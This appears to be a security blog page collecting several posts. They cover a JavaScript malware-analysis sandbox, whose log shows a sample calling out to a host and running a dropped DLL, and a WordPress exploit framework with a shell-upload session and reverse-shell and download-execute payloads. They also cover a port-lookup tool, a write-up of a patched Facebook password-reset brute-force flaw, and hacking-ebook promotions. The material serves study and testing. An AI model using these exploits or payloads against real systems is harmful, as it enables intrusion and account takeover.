Sandbox for semi-automatic Javascript malware analysis and payload extraction - Malware-Jail

Sandbox for semi-automatic Javascript malware analysis and payload extraction. Written for Node.js

malware-jail is written for Node's 'vm' sandbox . Currently implements WScript (Windows Scripting Host) context env/wscript.js , at least the part frequently used by malware. Internet browser context is partialy implemented env/browser.js .

Runs on any operating system, tested on Linux (Node v4.2.1).

Prerequisites

You'll need Node.js and npm .
malware-jail requires minimist , and xmlhttprequest and entities npm packages, you may install them with:

npm install

or

npm install minimist xmlhttprequest entities

Warning
Be careful when working with a real malware. A malware, which is aware of this sandbox, may try to escape and harm your PC. It's recommended you run it either from an unpriviledged Linux account or from within virtualized Windows machine. Angler files in the malware folder are NOT disarmed.

Usage

bash@linux# node jailme.js -h
11 Jan 00:07:39 - Malware sandbox ver. 0.2
11 Jan 00:07:39 - ------------------------
11 Jan 00:07:39 - Usage: node jailme.js  [[-e file1] [-e file2] .. ] [-o ofile] [-s odir] [--down=y] [malware1 [malware2] .. ]
11 Jan 00:07:39 -       -e ifile ... js that simulates specific environment
11 Jan 00:07:39 -       -o ofile ... name of the file where sandbox shall be dumped at the end
11 Jan 00:07:39 -       -s odir  ... output directory for generated files (malware payload)
11 Jan 00:07:39 -       --down=y ... use http request to download malware components automatically
11 Jan 00:07:39 -       malware  ... js with the malware code
11 Jan 00:07:39 - If no arguments are specified the default values are taken from config.json

In the examples folder you may find a deactivated malware file. Run the analysis with:

node jailme.js malware/example.js

or just simply:

node jailme.js

Internet browser based malware you may test with

node jailme.js malware/example_browser.js

The malware/example.js is the default malware file configured in config.json.
After analysis the complete sandbox context is dumped to a file 'sandbox_dump_after.json'. There you may find:

• _eval_calls - array of all eval() calls arguments. Useful if eval() is used for deobfucation.
• _wscript_saved_files - content of all files that the malware attempted to drop. The actual files are saved to the output/ directory too.
• _wscript_urls - all URLs that the malware intended to GET or POST.
• _wscript_objects - WScript or ActiveX objects created.

_'sandbox_dump_after.json' uses JSONPath , implemented by JSON-js/cycle.js , to save duplicated or cyclic references to a same object.

Sample output

bash@linux# node jailme.js malware/example.js
11 Jan 00:06:24 - Malware sandbox ver. 0.2
11 Jan 00:06:24 - ------------------------
11 Jan 00:06:24 - Sandbox environment sequence: env/eval.js,env/wscript.js
11 Jan 00:06:24 - Malware files: malware/example.js
11 Jan 00:06:24 - Output file for sandbox dump: sandbox_dump_after.json
11 Jan 00:06:24 - Output directory for generated files: output/
11 Jan 00:06:24 - ==> Preparing Sandbox environment.
11 Jan 00:06:24 -  => Executing: env/eval.js
11 Jan 00:06:24 - Preparing sandbox to intercept eval() calls.
11 Jan 00:06:24 -  => Executing: env/wscript.js
11 Jan 00:06:24 - Preparing sandbox to emulate WScript environment.
11 Jan 00:06:24 - ==> Executing malware file(s).
11 Jan 00:06:24 -  => Executing: malware/example.js
11 Jan 00:06:24 - ActiveXObject(WScript.Shell)
11 Jan 00:06:24 - Created: WScript.Shell[1]
11 Jan 00:06:24 - WScript.Shell[1].ExpandEnvironmentStrings(%TEMP%)
11 Jan 00:06:24 - ActiveXObject(MSXML2.XMLHTTP)
11 Jan 00:06:24 - Created: MSXML2.XMLHTTP[2]
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].open(POST,http://EXAMPLE.COM/redir.php,false)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].setRequestHeader(Content-Type, application/x-www-form-urlencoded)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].send(iTlOlnxhMXnM=0.588860877091065&jndj=IT0601)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Not sending data, if you want to interract with remote server, set --down=y
11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Calling onreadystatechange() with dummy data
11 Jan 00:06:24 - ActiveXObject(ADODB.Stream)
11 Jan 00:06:24 - Created: ADODB_Stream[3]
11 Jan 00:06:24 - ADODB_Stream[3].Open()
11 Jan 00:06:24 - ADODB_Stream[3].Write(str) - 10001 bytes
11 Jan 00:06:24 - ADODB_Stream[3].SaveToFile(%TEMP%\57020551.dll, 2)
11 Jan 00:06:24 - WScript.Shell[1].Exec(rundll32 %TEMP%\57020551.dll, DllRegisterServer)
11 Jan 00:06:24 - ADODB_Stream[3].Close()
11 Jan 00:08:42 - ==> Script execution finished, dumping sandbox environment to a file.
11 Jan 00:08:42 - Saving: output/_TEMP__49629482.dll
11 Jan 00:08:42 - Saving: output/_TEMP__38611354.pdf
11 Jan 00:08:42 - Generated file saved
11 Jan 00:08:42 - Generated file saved
11 Jan 00:08:42 - The sandbox context has been  saved to: sandbox_dump_after.json

In the above example the payload has been extracted into output/_TEMP__49629482.dll and output/_TEMP__38611354.pdf

Example: Analysing Angler EK

Download and extract Angler EK from a pcap file at ANGLER EK SENDS CRYPTOWALL into a malware/angler_full.html .
Strip the non Angler part and save as malware/angler_stripped.html .
Remove <script> tags and convert required <div> tags into:

document._addElementById(id, content);

and save as malware/angler.js .
Run the analysis:

node jailme.js malware/angler.js

Eventually capture the output:

node jailme.js malware/angler.js > angler_log.txt

Download  Malware-Jail

Read More

A Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems - Wordpress-Exploit-Framework

A Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems.

What do I need to run it?

Ensure that you have Ruby 2.2.x installed on your system and then install all required dependencies by opening a command prompt / terminal in the WPXF folder and running bundle install .

If bundler is not present on your system, you can install it by running gem install bundler .

How do I use it?

Open a command prompt / terminal in the directory that you have downloaded WordPress Exploit Framework to, and start it by running ruby wpxf.rb .

Once loaded, you'll be presented with the wpxf prompt, from here you can search for modules using the search command or load a module using the use command.

Loading a module into your environment will allow you to set options with the set command and view information about the module using info .

Below is an example of how one would load the symposium_shell_upload exploit module, set the module and payload options and run the exploit against the target.

wpxf > use exploit/symposium_shell_upload

[+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20>

wpxf [exploit/symposium_shell_upload] > set host wp-sandbox

[+] Set host => wp-sandbox

wpxf [exploit/symposium_shell_upload] > set target_uri /wordpress/

[+] Set target_uri => /wordpress/

wpxf [exploit/symposium_shell_upload] > set payload exec

[+] Loaded payload: #<Wpxf::Payloads::Exec:0x434d078>

wpxf [exploit/symposium_shell_upload] > set cmd echo "Hello, world!"

[+] Set cmd => echo "Hello, world!"

wpxf [exploit/symposium_shell_upload] > run

[-] Preparing payload...
[-] Uploading the payload...
[-] Executing the payload...
[+] Result: Hello, world!
[+] Execution finished successfully

For a full list of supported commands, take a look at This Wiki Page .

What is the difference between auxiliary and exploit modules?

Auxiliary modules do not allow you to run payloads on the target machine, but instead allow you to extract information from the target, escalate privileges or provide denial of service functionality.
Exploit modules require you to specify a payload which subsequently gets executed on the target machine, allowing you to run arbitrary code to extract information from the machine, establish a remote shell or anything else that you want to do within the context of the web server.

What payloads are available?

• bind_php: uploads a script that will bind to a specific port and allow WPXF to establish a remote shell.
• custom: uploads and executes a custom PHP script.
• download_exec: downloads and runs a remote executable file.
• exec: runs a shell command on the remote server and returns the output to the WPXF session.
• reverse_tcp: uploads a script that will establish a reverse TCP shell.

All these payloads, with the exception of custom , will delete themselves after they have been executed, to avoid leaving them lying around on the target machine after use or in the event that they are being used to establish a shell which fails.

How can I write my own modules and payloads?


Guides on writing modules and payloads can be found on The Wiki and full documentation of the API can be found at http://www.getwpxf.com/doc .

Download WEF

Read More

A Command To Search Port Names And numbers - Whatportis

It often happens that we need to find the default port number for a specific service, or what service is normally listening on a given port.


Usage

This tool allows you to find what port is associated with a service:

$ whatportis redis
+-------+------+----------+---------------------------------------+
| Name  | Port | Protocol | Description                           |
+-------+------+----------+---------------------------------------+
| redis | 6379 |   tcp    | An advanced key-value cache and store |
+-------+------+----------+---------------------------------------+

Or, conversely, what service is associated with a port number:

$ whatportis 5432
+------------+------+----------+---------------------+
| Name       | Port | Protocol | Description         |
+------------+------+----------+---------------------+
| postgresql | 5432 |   tcp    | PostgreSQL Database |
| postgresql | 5432 |   udp    | PostgreSQL Database |
+------------+------+----------+---------------------+

You can also search a pattern without knowing the exact name by adding the --like option:

$ whatportis mysql --like
+----------------+-------+----------+-----------------------------------+
| Name           |  Port | Protocol | Description                       |
+----------------+-------+----------+-----------------------------------+
| mysql-cluster  |  1186 |   tcp    | MySQL Cluster Manager             |
| mysql-cluster  |  1186 |   udp    | MySQL Cluster Manager             |
| mysql-cm-agent |  1862 |   tcp    | MySQL Cluster Manager Agent       |
| mysql-cm-agent |  1862 |   udp    | MySQL Cluster Manager Agent       |
| mysql-im       |  2273 |   tcp    | MySQL Instance Manager            |
| mysql-im       |  2273 |   udp    | MySQL Instance Manager            |
| mysql          |  3306 |   tcp    | MySQL                             |
| mysql          |  3306 |   udp    | MySQL                             |
| mysql-proxy    |  6446 |   tcp    | MySQL Proxy                       |
| mysql-proxy    |  6446 |   udp    | MySQL Proxy                       |
| mysqlx         | 33060 |   tcp    | MySQL Database Extended Interface |
+----------------+-------+----------+-----------------------------------+

Installation

$ pip install whatportis

JSON output

You can display the results as JSON, using the --json option :

$ whatportis 5432 --json
[
    {
        "description": "PostgreSQL Database",
        "protocol": "tcp",
        "name": "postgresql",
        "port": "5432"
    },
    {
        "description": "PostgreSQL Database",
        "protocol": "udp",
        "name": "postgresql",
        "port": "5432"
    }
]

REST API

Whatportis can also be started as a RESTful API server:

$ whatportis --server localhost 8080
 * Running on http://localhost:8080/ (Press CTRL+C to quit)

$ curl http://localhost:8080/ports
"ports": [
  {
    "description": "Description",
    "name": "Service Name",
    "port": "Port Number",
    "protocol": "Transport Protocol"
  },
  ...
]


$ curl http://localhost:8080/ports/3306
{
  "ports": [
    [
      "mysql",
      "3306",
      "tcp",
      "MySQL"
    ],
    [
      "mysql",
      "3306",
      "udp",
      "MySQL"
    ]
  ]
}

$ curl http://localhost:8080/ports/mysql?like
{
  "ports": [
    [
      "mysql-cluster",
      "1186",
      "tcp",
      "MySQL Cluster Manager"
    ],
    [
      "mysql-cluster",
      "1186",
      "udp",
      "MySQL Cluster Manager"
    ],
    ...
}

Notes

• "Why not use grep <port> /etc/services " ? Simply because I want a portable command that display the output in a nice format (a pretty table).
• The tool uses the Iana.org website to get the official list of ports. A private script has been created to fetch regularly the website and update the ports.json file. For this reason, an update command will be created in a future version.

Download  Whatportis

Read More

Facebook Password reset vulnerability allowed hackers to hijack any FB account

Hacking Facebook is one of the most sought queries on Google search because a lot of Facebook accounts are valuable. So much so that security researchers spend their valuable time and resources to hunt for vulnerabilities in Facebook in search of that elusive big break. One such ethical researcher, Anand Prakash has hit a jackpot with hacking Facebook. He has found a critical vulnerability in Facebook which could have allowed him to hack into any FB account without a sweat.

The vulnerability which Prakash found, resides in the way Facebook’s beta pages handle ‘Forgot Password’ requests. Normally, when you forget your password, Facebook gives you an option to get back into your FB account using ‘Forgot Password’ option which then sends a 6 digit code on your phone number/email address to your mobile phone. After you enter this code in the window, you are able to access your FB account and reset your password.

Prakash decided to test the vulnerability in Facebook’s Forgot Password mechanism. He tried to brute force the 6 digit code in the ‘Forgot Password’ window but since Facebook has placed a limit of 12 attempts he was unsuccessful and locked out after 12 attempts.

He then turned his attention to Facebook’s beta pages,  beta.facebook.com and mbasic.beta.facebook.com and found that the rate limit was missing on forgot password endpoints in these two pages. Once he found that there was no limitation, he could brute force into any Facebook account without worrying about the limits.

Vulnerable request:


POST /recover/as/code/ HTTP/1.1 Host: beta.facebook.com
lsd=AVoywo13&n=XXXXX


Brute forcing the “n” successfully allowed Prakash to set new password for any Facebook user.

Video of the Proof of Concept

Prakash reported the issue to the Facebook’s security team on 22nd Feb 2016. Facebook immediately acknowledged the severity of the vulnerability and issued a fix on 23rd Feb.  It also awarded Prakash a bug bounty of $15,000 which is among the top bounties by the networking giant.

By OffensiveSec

Read More

Directory with various materials for studies hacking

Obs, I am not responsible by your act with hacking materials, the materials is responsibility the student 

Directory with various materials for studies hacking, reverse engineering, malware, PenTest tools etc.

By OffensiveSec

Access Ebooks

Read More

Hacking Ebooks ++ VI

Best Hacking EBooks 2016 – In the Era of Teenagers many of want to Become a “Hacker” But In-fact It is not an Easy Task because Hacker’s have Multiple Programming Skills and Sharp Mind that Find Vulnerability in the Sites, Software and Other types of Application. If You want to become a Hacker you need to Spend most of the Time on your Computer to Learn New Technologies and Reading Hacking Book that can Help you to Become a Ethical Hacker. First You need to Read Hacking Books Carefully then Perform Practically not for Hacking Purpose Just only for Educational Purpose.

Access Ebooks

Read More

Hacking Ebooks ++ V

Best Hacking EBooks 2016 – In the Era of Teenagers many of want to Become a “Hacker” But In-fact It is not an Easy Task because Hacker’s have Multiple Programming Skills and Sharp Mind that Find Vulnerability in the Sites, Software and Other types of Application. If You want to become a Hacker you need to Spend most of the Time on your Computer to Learn New Technologies and Reading Hacking Book that can Help you to Become a Ethical Hacker. First You need to Read Hacking Books Carefully then Perform Practically not for Hacking Purpose Just only for Educational Purpose.

Access Ebooks

Read More

Hacking Ebooks ++ IV

Best Hacking EBooks 2016 – In the Era of Teenagers many of want to Become a “Hacker” But In-fact It is not an Easy Task because Hacker’s have Multiple Programming Skills and Sharp Mind that Find Vulnerability in the Sites, Software and Other types of Application. If You want to become a Hacker you need to Spend most of the Time on your Computer to Learn New Technologies and Reading Hacking Book that can Help you to Become a Ethical Hacker. First You need to Read Hacking Books Carefully then Perform Practically not for Hacking Purpose Just only for Educational Purpose.

Access Ebooks

Read More

Hacking Ebooks ++ III

Best Hacking EBooks 2016 – In the Era of Teenagers many of want to Become a “Hacker” But In-fact It is not an Easy Task because Hacker’s have Multiple Programming Skills and Sharp Mind that Find Vulnerability in the Sites, Software and Other types of Application. If You want to become a Hacker you need to Spend most of the Time on your Computer to Learn New Technologies and Reading Hacking Book that can Help you to Become a Ethical Hacker. First You need to Read Hacking Books Carefully then Perform Practically not for Hacking Purpose Just only for Educational Purpose.

Access Ebooks

Read More